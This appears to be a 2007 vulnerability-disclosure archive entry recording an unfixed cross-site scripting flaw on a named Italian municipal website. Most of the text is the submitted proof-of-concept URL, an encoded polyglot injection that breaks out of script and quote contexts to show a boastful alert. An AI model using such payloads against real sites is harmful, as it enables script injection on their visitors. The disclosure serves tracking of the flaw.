Security researcher T0T4L, has submitted on 14/06/2007 a cross-site-scripting (XSS) vulnerability affecting www.comune.bogliasco.ge.it, which at the time of submission ranked 6223672 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 14/06/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 14/06/2007 |
Date published: 14/06/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: T0T4L |
Domain: www.comune.bogliasco.ge.it |
Category: XSS |
Pagerank: 6223672 |
|---|
URL: http://www.comune.bogliasco.ge.it/hh/index.php?x=';alert(String.fromCharCode(84,48,84,52,76,32,79,87
,78,83,32,66,111,103,108,105,97,115,99,111,44,32,77,85,65,72,65,72,72,65,72,65,72,65,65))//\';alert(
String.fromCharCode(84,48,84,52,76,32,79,87,78,83,32,66,111,103,108,105,97,115,99,111,44,32,77,85,65
,72,65,72,72,65,72,65,72,65,65))//%22;alert(String.fromCharCode(84,48,84,52,76,32,79,87,78,83,32,66,
111,103,108,105,97,115,99,111,44,32,77,85,65,72,65,72,72,65,72,65,72,65,65))//\%22;alert(String.from
CharCode(84,48,84,52,76,32,79,87,78,83,32,66,111,103,108,105,97,115,99,111,44,32,77,85,65,72,65,72,7
2,65,72,65,72,65,65))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(84,48,84,52
,76,32,79,87,78,83,32,66,111,103,108,105,97,115,99,111,44,32,77,85,65,72,65,72,72,65,72,65,72,65,65)
)%3C/SCRIPT%3E&jvs=';alert(String.fromCharCode(84,48,84,52,76,32,79,87,78,83,32,66,111,103,108,105,9
7,115,99,111,44,32,77,85,65,72,65,72,72,65,72,65,72,65,65))//\';alert(String.fromCharCode(84,48,84,5 |
|
Click here to view the mirror
|
|
|
